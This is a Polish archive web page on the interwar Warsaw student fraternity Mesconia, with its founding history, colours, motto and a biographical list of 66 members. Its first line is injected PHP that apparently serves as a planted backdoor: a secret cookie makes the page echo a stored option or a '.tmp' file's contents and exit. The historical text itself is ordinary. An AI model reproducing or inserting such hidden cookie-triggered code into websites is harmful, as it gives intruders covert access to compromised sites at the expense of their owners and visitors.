if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Mesconia

Dekiel Mesconii - vide Poszukiwania. Nazwa:
Akademicka Korporacja “Mesconia”
Siedziba:
Warszawa
Data powstania:
1922 r.
Barwy:
ciemnowiśniowa – biała – szaro-stalowa
Dewiza:
„Unio in spe felicitatis”

Rys historyczny

Listownik Mesconii, lata 30-te.

Mesconia została założona dnia 6 II 1922 r. przez grupę 12 studentów uczeni warszawskich pochodzących z Włocławka, w większości absolwentów Gimnazjum Ziemi Kujawskiej we Włocławku. Nazwa korporacji nawiązuje do łacińskiej formy imienia pierwszego władcy Polski - Mieszka I.

Herb Mesconii, 1931 r.

Początkowo od listopada 1922 r. do początków 1924 r. należała do Związku Polskich Korporacji Akademickich. Kandydowała pod opieką K! Patria. W październiku 1924 r. wraz z K! Laudanią oraz K! Lublinią powołały nowy związek międzykorporacyjny - Zjednoczenie Polskich Akademickich Korporacji Chrześcijańskich. Mesconia, Warszawa 28 X 1928 r.W 1928 r. wystąpiła jednak ze Zjednoczenia i ponownie została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 31 I 1927 r.). Kandydowała pod opieką K! Arkonia. Prawa członka rzeczywistego Związku uzyskała dnia 2 IX 1929 r. W konsekwencji “reform” jędrzejewiczowskich po 1933 r. zanikła.

Siedziba korporacji w latach 1928-33 mieściła się przy ul. Kruczej 7.

Spotkanie Mescończyków, lata 70-te.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 66 nazwisk.

Po wojnie odbywały przez wiele lat regularnie odbywały się w Warszawie doroczne spotkania grupy członków Mesconii.

Lista członków

Poniższa, niekompletna lista członków Mesconii obejmuje ponad 60 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Feliks Adamczak, student UW, c. 1928/29, akt. 1928/29-32
 2. Gotfryd Albrecht, (1902 - 6 września 1994) student i absolwent PW, akt. 1928-29
 3. Władysław Bąk, ( - przed 1983) założyciel Mesconii
 4. Wacław Biernacki, ( - 1969)
 5. Bogumił Budka, ( - 26 grudnia 1980) założyciel Mesconii, prawnik, adwokat, prezes Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25
 6. Kazimierz Chmielewski, ( - przed 1980) student UW, akt. 1928-32
 7. Stanisław Domke, ( - 1975) założyciel Mesconii, prawnik, adwokat
 8. Henryk Dorenda, ( - przed 1980) student SGGW, akt. 1928-32
 9. Roman Dorenda, student PW, akt. 1928-33, olderman sem. zim. 1932/33
 10. Feliks Fedorowicz, (1903-2001) student UW, c. 1927, akt. 1927-31, wiceprezes sem. zim. 1930/31, wiceprezes sem. zim. 1931/32, ekonomista
 11. Tadeusz Gaworski, ( - 1942 w Woldenbergu) z Włocławka, student WSH, c. 1928/29, akt. 1928/29-33, sekretarz sem. zim. 1930/31, oficer rez., uczestnik wojny obronnej 1939, w niewoli niemieckiej, zmarł w oflagu IIC Woldenberg

  Stefan Gębarski.

 12. Stefan Gębarski, (1906 - 9 maja 1984) student WSH, akt. 1928-33, sekretarz sem. let. 1928/29, sekretarz sem. let. 1929/30, po 1945 pracował w cukrownictwie na Ziemiach Odzyskanych, pochowany w alei zasłużonych na Cmentarzu w Głogowie

 13. Witold Giziński, ( - 1944 w Warszawie) z Włocławka, student PW, c. 1929/30, akt. 1929/30-33, sekretarz 1931/32, wiceprezes sem. let. 1932/33, zginął w Powstaniu Warszawskim
 14. Marian Gładysz, student WSH, c. 1932, akt. 1932-33
 15. Jerzy Górecki, ( - przed 1994) student PW, c. 1932, akt. 1932-33
 16. Józef Grątkowski, ( - 24 października 1994 w Konstancinie) student i absolwent budownictwa PW, akt. 1931-33
 17. Czesław Grzelachowski, ( - 6 lutego 1983) student UW, c. 1929/30, akt. 1929/30-32, prezes sem. zim. 1932/33, olderman sem. let. 1932/33
 18. Edmund Iwaszkiewicz, ( - przed 1980) założyciel Mesconii
 19. Marian Jankowski, student UW, c. 1929/30, akt. 1929/30-33

  Jan Kajrunajtys, 1928 r.

 20. Jan Kajrunajtys, (4 lutego 1904 w Konopnicy k. Rawy Mazowieckiej - 3 grudnia 1960 w Łodzi) s. Macieja i Elżbiety z d. Radziszewska, absolwent Gimnazjum Państwowej Ziemi Kujawskiej we Włocławku 1924, student i absolwent 1931 Wydziału Inżynierii Wodnej PW, akt. 1928-31, olderman sem. let. 1929/30 (?), prezes sem. zim. 1930/31, po studiach na różnych stanowiskach w instytucjach odpowiedzialnych za budowę i eksploatację sieci wodociągów i kanalizacji, w szczególności zastępca kierownika Inspekcji Sieci Wodno-Kanalizacynej, w czasie Powstania Warszawskiego w służbie ochrony przeciwpożarowej, po wojnie kierownik oddziału instalacji Sieci Wodno-Kanalizacynej, naczelny dyrektor Miejskiego Przedsiębiorstwo Robót Wodociągowo-Kanalizacyjnych, brał udział w projektowaniu Łódzkiej Hali Sportowej i Teatru Wielkiego, członek NOT i Polskiego Związku Inżynierów i Techników Sanitarnych, pochowany na cmentarzu Doły w Łodzi

 21. Tadeusz Kamiński, ( - 1939) student PW, założyciel Mesconii, akt. 1922-30
 22. Tadeusz Kołodziejski, ( - 1972) student SGGW, akt. 1928-30
 23. Adam Konwicki, ( - 14 marca 1976) brat Innocentego (Mesconia), student PW, akt. 1928-33, olderman sem. zim. 1930/31
 24. Innocenty Konwicki, ( - 1968) brat Adam (Mesconia), student SGGW, c. 1931/32, akt. 1931/32-33
 25. Zdzisław Kornacki, ( - sierpień 1989) doc., doradca firm prowadzących budownictwo wodne
 26. Antoni Krasowski (Krassowski), ( - 1939) student PW, akt. 1928-33
 27. Edward Krygier, ( - przed 1980) student SGGW, akt. 1928-33
 28. Czesław Kurowski, ( - przed 1980) założyciel Mesconii
 29. Mirosław Kwasieborski, ( - przed 1980) student PW, akt. 1928-33, po wojnie na emigracji w Wielkiej Brytanii, prof. politechniki
 30. Józef Łapiński, ( - przed 1980) student PW, akt. 1928-29

  Jerzy Łącki, prawd. lata 20-te.

 31. Jerzy Łącki, ( - 1942 w Auschwitz) dyrektor Fabryki Papieru w Bydgoszczy, działacz konspiracyjny, aresztowany przez Gestapo, zesłany do obozu koncentracyjnego w Auschwitz, tam zamordowany

 32. Stanisław Tadeusz Tarnawa-Malczewski, ( - 20 grudnia 1986) student UW, sekretarz sem. zim. 1932/33
 33. Jan Miedziński, ( - 1991)
 34. Bogdan Miller, ( - 1942 w Auschwitz) pochodził z Włocławka, założyciel Mesconii, prezes Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927, aresztowany przez Gestapo, zesłany do Auschwitz, tam zamordowany
 35. Józef Nast., ( - przed 1983) założyciel Mesconii
 36. Władysław Nawarski, (1902 - 2 stycznia 1979 ?) student PW, akt. 1928, prof. PW
 37. Zbigniew Niekrasz, ( - przed 1994)
 38. Marjan Pacho, student UW, c. 1929/30, akt. 1929/30-32
 39. Władysław Padacz, ( - 26 marca 1975) absolwent Gimnazjum im. Króla Władysława IV w Warszawie 1920, student UW, później wstąpił do seminarium duchownego, ks. infuat, przewodniczący Najwyższego Sądu Kościelnego, współpracownik kard. Stefana Wyszyńskiego, odznaczony Krzyżem Virtuti Militari
 40. Mieczysław Paszkiewicz, (1901 w Suwałkach - 9 stycznia 1980) uczestnik walk o niepodległość, student i absolwent prawa UW, student UP 1929 (Poznań), akt. 1928-32, uczestnik Powstania Warszawskiego, po wojnie wieloletni radca prawny w Dyrekcji Okręgowej Kolei Państwowych, pochowany na Cmentarzu Komunalnym Północnym w Warszawie
 41. Bolesław Pawłowski, ( - 16 stycznia 1980) student PW, akt. 1928-31, długoletni dyrektor techniczny Wodociągów i Kanalizacji w Warszawie
 42. Paweł Penno, ( - 1987) student SGGW, c. 1929/30, akt. 1929/30-33
 43. Józef Piasek, ( - przed 1980) student PW, c. 1928/29, akt. 1928/29-33, wiceprezes sem. zim. 1932/33, prezes sem. let. 1932/33
 44. Jan Pieniążek, ( - 1967) student PW, c. 1932, akt. 1932-33
 45. Stefan Pietrzak, ( - przed 1994) student PW, akt. 1928-33
 46. Jan Piotrowicz, ( - przed 1983)
 47. Czesław Podlecki, ( - 1965) student PW, założyciel Mesconii, akt. 1922-29, przed wojną i w czasie wojny właściciel przedsiębiorstwa budowlanego
 48. Edward Poraziński, student PW, akt. 1932-33
 49. Jarosław Pruszyński, (1911-1983) założyciel Mesconii
 50. Kazimierz Przywieczerski, ( - wrzesień 1939) z maj. Plebanka pod Nieszawą, student i absolwent SGGW, c. 1932, akt. 1932-33, oficer rez., w wojnie obronnej 1939 w 14 Pułku Piechoty, poległ w walkach w czasie bitwy pod Bzurą w okolicach Łowicza/Sochaczewa
 51. Jerzy Rościszewski, student UW, c. 1932, akt. 1932-33
 52. Tadeusz Sztumberk-Rychter, (19 sierpnia 1907 w Koluszkach - 14 marca 1972 w Warszawie) s. Witolda i Stefanii, absolwent Gimnazjum we Włocławku, student UW, c. 1928/29, akt. 1928/29-32, zawodowy oficer artylerii WP, uczestnik wojny obronnej 1939, w konspiracji w AK ps. “Miłosz”, “Tadeusz”, “Żegota”, dowódca 27 Wołyńskiej Dywizji Piechoty Armii Krajowej, pochowany na Cmentarzu Wojskowym na Powązkach, odznaczony m.in. Krzyżem Srebrnym Virtuti Militari, trzykrotnie Krzyżem Walecznych, pośmiertnie Krzyżem Kawalerskim OOP
 53. Józef Rzeczycki, ( - 1944) student PW, akt. 1928-33, prezes sem. let. 1928/29, zginął śmiercią lotnika w służbie PSZ-RAF
 54. Witold Siciński, ( - przed 1994)
 55. Józef Sidorowicz, ( - przed 1983)
 56. Tadeusz Sławiński, (1911 - 24 grudnia 2006) prawnik, uczestnik wojny obronnej 1939, więzień obozów Osterode, II C w Woldenbergu oraz Sandbostel, sędzia, społecznik, autor wspomnień “Moje dziewięćdziesięciolecie” (2003) oraz “Włocławskie silva rerum – rzecz o mieście, ludziach i wydarzeniach” (2004), odznaczony Krzyżem Komandorskim OOP
 57. Tadeusz Słomiński, [być może powinno być Tadeusz Sławiński], student UW, c. 1932, akt. 1932-33
 58. Kazimierz Szmagier, członek 1924-25 oraz wiceprezes 1927 Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich
 59. Henryk Świdziński, (8 września 1904 w Strzyżowie Lubelskim - 23 czerwca 1969 w Naucznoje pod Symferopolem na Krymie) s. Januarego i Marii z d. Wołłk-Łaniewskiej, student i absolwent geologii UW, akt. 1924-29, członek Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25, po studiach pracownik Wydziału Naftowego Państwowego Instytutu Geologicznego w Warszawie, specjalista geologii regionalnej Karpat oraz geologii złóż ropy naftowej i gazu ziemnego, uczestnik wojny obronnej 1939, po wojnie prof. UJ i AGH, dziekan wydziału Geologiczno-Poszukiwawczego AGH, wieloletni prezes Państwowego Instytutu Geologicznego w Warszawie, przewodniczący Zarządu Głównego Polskiego Towarzystwa Geologicznego, członek Zarządu Głównego Polskiego Towarzystwa Przyrodników im. Kopernika, członek Prezydium Komitetu Geologicznego PAN oraz członek Rady Naukowej Instytutu Geologicznego
 60. Witold Świdziński, ( - 1976) student PW, założyciel Mesconii, akt. 1922-33, prezes sem. let. 1929/30, olderman 1931/32, po wojnie na emigracji w Wielkiej Brytanii
 61. Stefan Trzebski, ( - lato 1985) student PW, akt. 1928-33, wiceprezes sem. let. 1928/29, wiceprezes sem. let. 1929/30, prezes sem. zim. 1931/32
 62. Zbigniew Trzebski, student UW, c. 1932, akt. 1932-33

  Stanisław Tyszkiewicz, prawd. druga poł. lat 20-tych.

 63. Stanisław Tyszkiewicz, (14 października 1904 w Ruszkowie k. Nieszawy - 18 stycznia 1982 w Aninie k. Warszawy) s. Józefa Tomasza i Józefy z d. Knorr, ukończył Gimnazjum we Włocławku 1919 (matura 1923), służbę wojskową pełnił w Batalionie Wojsk Wartowniczych i Etapowych i Szkole Morskiej w Tczewie 1919-21, student i absolwent leśnictwa SGGW 1923-29, akt. 1928-29, olderman sem. let. 1928/29, prezes Bratniej Pomocy Studentów SGGW oraz Związku Kół Leśników Polskiej Młodzieży, po studiach praktykant w Nadleśnictwie Grodzisko i wykładowca w Państwowej Szkole dla Leśniczych w Zagórzu, od 1933 asystent w Zakładzie Doświadczalnym Lasów Państwowych w Warszawie, od 1936 kierownik Stacji Oceny Nasion w Instytucie Badaczym Lasów Państwowych, doktorat 1936, w czasie okupacji pracownik Spółdzielni Leśników i Właścicieli Lasów w Warszawie 1940-44, członek AK, wykładowca na tajnej SGGW 1942-43, organizator Stacji Oceny Nasion przy Nadleśnictwie Drewnica oraz naldeśniczy tamże 1944-45, w latach 1945-74 kierownik Stacji Oceny Nasion, a później Zakładu Nasiennictwa i Selekcji Instytutu Badawczego Leśnictwa, wykładowca na Wydziale Leśnym SGGW, habilitacja 1974, prof. zw., bezpartyjny, członek rad naukowych Instytutu Badawczego Leśnictwa oraz Instytutu Dendrologii w Kórniku, redaktor naczelny “Sylwana”, autor licznych prac z zakresu hodowli lasu, nasiennictwa i selekcji drzew, odznaczony m.in. Złotym Krzyżem Zasługi, Krzyżem Kawalerskim 1958 i Oficerskim 1965 OOP, czechosłowackim Wielkim Krzyżem Zasługi Lwa 1968, francuskim Krzyżem “Ordre du Merite Agricole” 1973, pochowany na cmentarzu przy ul. Korkowej w Wawrze-Glinki w Warszawie

 64. Jerzy Twardowski, student UW, c. 1932, akt. 1932-33, sekretarz sem. let. 1932/33
 65. Brunon Wiszniewski, ( - 20 października 1976) student PW, akt. 1928-32, specjalista z zakresu melioracji wodnych, pracownik budownictwa wodnego, m.in. starszy projektant, główny projektant, kierownik Zespołu, kierownik pracowni Instytutu Organizacji i Mechanizacji Budownictwa, wieloletni działacz Stowarzyszenia Inżynierów i Techników Wodnych i Melioracyjnych, odznaczony Srebrnym Krzyżem Zasługi, Złotą Odznaką Honorową NOT - SITWM
 66. Mieczysław Żytner (Zytner), ( - 1942 w Rudau k. Królewca) pochodził z Włocławka, założyciel Mesconii, aresztowany przez Gestapo, osadzony w obozie Rudau wraz z innymi nauczycielami, tam zmarł

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1928-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Mesconia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 9 IX 2010 r.
Ostatnia zmiana: 10 VI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Mesconia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 10 VI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }